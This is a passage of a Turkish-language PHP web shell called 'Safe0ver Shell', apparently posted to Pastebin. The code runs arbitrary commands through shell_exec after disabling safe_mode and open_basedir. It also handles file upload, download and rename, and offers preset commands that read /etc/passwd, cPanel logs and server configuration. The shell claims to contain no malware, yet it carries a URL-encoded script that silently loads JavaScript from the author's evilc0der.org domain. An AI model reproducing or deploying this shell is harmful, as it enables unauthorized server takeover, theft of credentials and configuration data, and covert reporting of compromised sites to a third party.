  725. $fp=fopen("$downloadfile" ,"rb");
  726. fpassthru($fp);
  727. flush();
  728. }
  729. }
  730. elseif ( $cmd=="upload" ) { /* <!-- Upload File form --> */
  731. ?>
  732. <center>
  733. <table>
  734. <tr>
  735. <td NOWRAP>
  736. Dosya Y�kleme Sekmesine Tikladiniz !
  737. <br> Eger Y�klemek istediginiz Dosya mevcut ise �zerine Yazilir.<br><br>
  738. <form enctype="multipart/form-data" action="<?php echo "$SFileName?$urlAdd" ?>" method="post">
  739. <input type="hidden" name="MAX_FILE_SIZE" value="1099511627776">
  740. <input type="hidden" name="cmd" value="uploadproc">
  741. <input type="hidden" name="dir" value="<?php echo $dir ?>">
  742. <input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>">
  743. <input type="hidden" name="lastdir" value="<?php echo $lastdir ?>">
  744. Dosya Y�kle:<br>
  745. <input size="75" name="userfile" type="file"><br>
  746. <input type="submit" value="Y�kle">
  747. </form>
  748. <br>
  749. <form action="<?php echo "$SFileName?$urlAdd" ?>" method="POST">
  750. <input type="hidden" name="cmd" value="<?php echo $lastcmd ?>">
  751. <input type="hidden" name="dir" value="<?php echo $lastdir ?>">
  752. <input tabindex="0" type="submit" value="Iptal">
  753. </form>
  754. </td>
  755. </tr>
  756. </table>
  757. </center>
  758.  
  759. <?php
  760. }
  761. elseif ( $cmd=="uploadproc" ) { /* <!-- Process Uploaded file --> */
  762. echo "<center><table><tr><td NOWRAP>";
  763. if (file_exists($userfile))
  764. $res = copy($userfile, "$dir/$userfile_name");
  765. echo "Uploaded \"$userfile_name\" to \"$userfile\"; <br>\n";
  766. if ($res) {
  767. echo "Basariyla Y�klendi \"$userfile\" to \"$dir/$userfile_name\".\n<br><br>";
  768. echo "Y�klenen Dosya Adi: \"$userfile_name\".\n<br>Dosya Adi: \"$userfile\".\n<br>";
  769. echo "Dosya Boyutu: ".formatsize($userfile_size).".\n<br>Filetype: $userfile_type.\n<br>";
  770. }
  771. else {
  772. echo "Y�klenemedi...";
  773. }
  774. echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D�n\"></form></center>" ;
  775. echo "<br><br></td></tr></table></center>";
  776. }
  777. elseif ( $cmd=="file" ) { /* <!-- View a file in text --> */
  778. echo "<hr>";
  779. $fc = @file( $file ); while ( @list( $ln, $line ) = each( $fc ) ) {
  780. echo spacetonbsp(@htmlentities($line))."<br>\n";
  781. }
  782. echo "<hr>";
  783. }
  784. elseif ( $cmd=="ren" ) { /* <!-- File and Directory Rename --> */
  785. if (function_exists('is_dir')) {
  786. if (is_dir("$oldfile")) {
  787. $objname = "Directory";
  788. $objident = "Directory";
  789. }
  790. else {
  791. $objname = "Filename";
  792. $objident = "file";
  793. }
  794. }
  795. echo "<table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=100% style=\"class=\"silver border\"><center>&nbsp;Rename a file:&nbsp;</center></td></tr></table><br>\n";
  796. If (empty($newfile) != true) {
  797. echo "<center>";
  798. $return = @rename($oldfile, "$olddir$newfile");
  799. if ($return) {
  800. echo "$objident renamed successfully:<br><br>Old $objname: \"$oldfile\".<br>New $objname: \"$olddir$newfile\"";
  801. }
  802. else {
  803. if ( @file_exists("$olddir$newfile") ) {
  804. echo "Error: The $objident does already exist...<br><br>\"$olddir$newfile\"<br><br>Hit your browser's back to try again...";
  805. }
  806. else {
  807. echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it.";
  808. }
  809. }
  810. echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D�n\"></form></center>" ;
  811. }
  812. else {
  813. $dpos = strrpos($oldfile, "/");
  814. if (strval($dpos)!="") {
  815. $olddir = substr($oldfile, 0, $dpos+1);
  816. }
  817. else {
  818. $olddir = "$lastdir/";
  819. }
  820. $fpos = strrpos($oldfile, "/");
  821. if (strval($fpos)!="") {
  822. $inputfile = substr($oldfile, $fpos+1);
  823. }
  824. else {
  825. $inputfile = "";
  826. }
  827. echo "<center><table><tr><td><form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
  828. echo "<input type=\"hidden\" name=\"cmd\" value=\"ren\">\n";
  829. echo "<input type=\"hidden\" name=\"oldfile\" value=\"$oldfile\">\n";
  830. echo "<input type=\"hidden\" name=\"olddir\" value=\"$olddir\">\n";
  831. echo "<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">\n";
  832. echo "<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">\n";
  833. echo "Rename \"$oldfile\" to:<br>\n";
  834. echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><br><input type=\"submit\" value=\"Rename\">";
  835. echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input type=\"submit\" value=\"Cancel\"></form>";
  836. echo "</td></tr></table></center>";
  837. }
  838. }
  839. else if ( $cmd == "con") {
  840.  
  841. ?>
  842. <center>
  843. <table>
  844. <tr><td>&nbsp;</td>
  845. </tr></table>
  846. <?php
  847. }
  848. else { /* <!-- There is a incorrect or no parameter specified... Let's open the main menu --> */
  849. $isMainMenu = true;
  850. ?>
  851. <table width="100%" border="0" cellpadding="0" cellspacing="0">
  852. <tr>
  853. <td width="100%" class="border">
  854. <center>&nbsp;-<[{ <?php echo $scriptTitle ?> Main Menu }]>-&nbsp;</center>
  855. </td>
  856. </tr>
  857. </table>
  858. <br>
  859. <center>
  860. <table border="0" NOWRAP>
  861. <tr>
  862. <td valign="top" class="silver border">
  863. <?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>##Safe0ver##</strong></font>", "cmd=dir&dir=.").sp(2); ?> </td>
  864. <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP><span class="style5"> Safe0ver Shell Piyasada Bulunan Bir Cok Shell'in Kodlarindan(c99,r57 vs...) Sentezlenerek Kodlanmistir.Entegre Olarak Bypass �zelligi Eklenmis Ve B�ylece Tahrip G�c� Y�kseltilmistir.Yazilimimiz Hic bir Virus,worm,trojan gibi Kullaniciyi Tehdit Eden Veya S�m�ren yazilimlar Icermemektedir.<p>--------------------------<p>Bypass Kullan�m:<b>Cat /home/evilc0der/public_html/config.php</b> Gibi Olmalidir.<br>
  865. </span></td>
  866. </tr>
  867. </table>
  868. <br><p><br>Safe Mode ByPAss<p><form method="POST">
  869. <p align="center"><input type="text" size="40" value="<? if($_POST['dizin'] != "") { echo $_POST['dizin']; } else echo $klasor;?>" name="dizin">
  870. <input type="submit" value="�alistir"></p>
  871. </form>
  872. <form method="POST">
  873. <p align="center"><select size="1" name="dizin">
  874. <option value="uname -a;id;pwd;hostname">Sistem Bilgisi</option>
  875. <option value="cat /etc/passwd">cat /etc/passwd</option>
  876. <option value="cat /var/cpanel/accounting.log">cat /var/cpanel/accounting.log</option>
  877. <option value="cat /etc/syslog.conf">cat /etc/syslog.conf</option>
  878. <option value="cat /etc/hosts">cat /etc/hosts</option>
  879. <option value="cat /etc/named.conf">cat /etc/named.conf</option>
  880. <option value="cat /etc/httpd/conf/httpd.conf">cat /etc/httpd/conf/httpd.conf</option>
  881. <option value="netstat -an | grep -i listen">A�ik Portlar</option>
  882. <option value="ps -aux">�alisan Uygulamalar</option>
  883. </select> <input type="submit" value="�alistir"></p>
  884. </form>
  885. ------------------------------------------------------------------------------------<p>
  886. <?
  887. $evilc0der=$_POST['dizin'];
  888. if($_POST['dizin'])
  889. {
  890. ini_restore("safe_mode");
  891. ini_restore("open_basedir");
  892. $safemodgec = shell_exec($evilc0der);
  893. echo "<textarea rows=17 cols=85>$safemodgec</textarea>";
  894. }
  895. ?>
  896. <Script Language='Javascript'>
  897. <!-- HTML Encryption provided by iWEBTOOL.com -->
  898. <!--
  899. document.write(unescape('%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%53%43%52%49%50%54%20%53%52%43%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%65%76%69%6C%63%30%64%65%72%2E%6F%72%67%2F%6C%6F%67%7A%2F%79%61%7A%2E%6A%73%3E%3C%2F%53%43%52%49%50%54%3E%3C%2F%62%6F%64%79%3E%3C%2F%68%74%6D%6C%3E'));
  900. //-->
  901. </Script>
  902. </center>
  903. <br>
  904. <?php
  905. }
  906.  
  907. if ($cmd != "downl") {
  908. if ( $isMainMenu != true) {
  909. ?>
  910.  
  911. <table width="100%" border="0" cellpadding="0" cellspacing="0">
  912. <tr>
  913. <td width="100%" style="class="silver border">
  914. <center><strong>
  915. &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Main Menu&nbsp;] </font>", "cmd=&dir="); ?>&nbsp;&nbsp;
  916. &nbsp;&nbsp;&nbsp;&nbsp;
  917. &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;R00T&nbsp;] </font>", "cmd=dir&dir=."); ?> &nbsp;&nbsp;
  918. </strong></center>
  919. </td>
  920. </tr>
  921. </table>
  922. <br>
  923. <?php
  924. }
  925. ?>
  926. <table width=100% border="0" cellpadding="0" cellspacing="0">
  927. <tr>
  928. <td width="100%" class="silver border">
  929. <center>&nbsp;<?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?>&nbsp;</center>
  930. </td>
  931. </tr>
  932. </table>
  933. </td>
  934. </tr>
  935. </table>
  936.  
  937. <?php
  938. }
  939.  
  940. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!